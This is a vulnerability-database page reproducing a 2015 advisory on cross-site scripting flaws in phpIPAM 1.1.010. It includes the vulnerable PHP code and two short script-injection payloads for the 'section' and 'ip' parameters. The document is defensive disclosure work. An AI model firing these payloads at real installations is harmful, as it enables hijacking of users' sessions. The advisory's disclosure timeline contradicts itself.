| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2015-6529 | 21 Aug 201513:00 | – | circl | |
| phpipam Cross-Site Scripting Vulnerability | 22 Aug 201500:00 | – | cnvd | |
| CVE-2015-6529 | 20 Aug 201520:00 | – | cve | |
| CVE-2015-6529 | 20 Aug 201520:00 | – | cvelist | |
| EUVD-2015-6468 | 7 Oct 202500:30 | – | euvd | |
| CVE-2015-6529 | 20 Aug 201520:59 | – | nvd | |
| phpIPAM < 1.2 Multiple XSS Vulnerabilities | 16 Mar 201800:00 | – | openvas | |
| Cross site scripting | 20 Aug 201520:59 | – | prion |
`[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPIPAM0812.txt
Vendor:
================================
phpipam.net
Product:
======================================
phpipam-1.1.010
Vulnerability Type:
==========================
Cross Site Scripting - XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
There is an XSS entry point in 'error.php' file under site directory,
on line 66 of error.php we find the vulnerable server code.
<?php print _('Provided http error code is'); ?>: <strong><?php
print_r($_REQUEST['section']); ?>: <?php print
$http_codes[$_REQUEST['section']]; ?></strong>
PHP print function is called on $_REQUEST['section'] variable without
checking or escaping the response output to victims web browser.
Exploit code(s):
===============
1- GET method XSS:
------------------
http://localhost/phpipam/site/error.php?section=
<script>alert(document.cookie)</script>
vulnerable parameter "section"
2- POST method XSS:
-------------------
http://localhost/phpipam/site/tools/searchResults.php
vulnerable parameter "ip"
Inject payload into search field.
"<script>alert(666)</script>
Disclosure Timeline:
=========================================================
Vendor Notification: August 10, 2015
July 12, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote & Local
Authentication required:
========================
No
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] phpipam-1.1.010
Vulnerable Parameter(s): [+] section
Affected Area(s): [+] site, ip
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation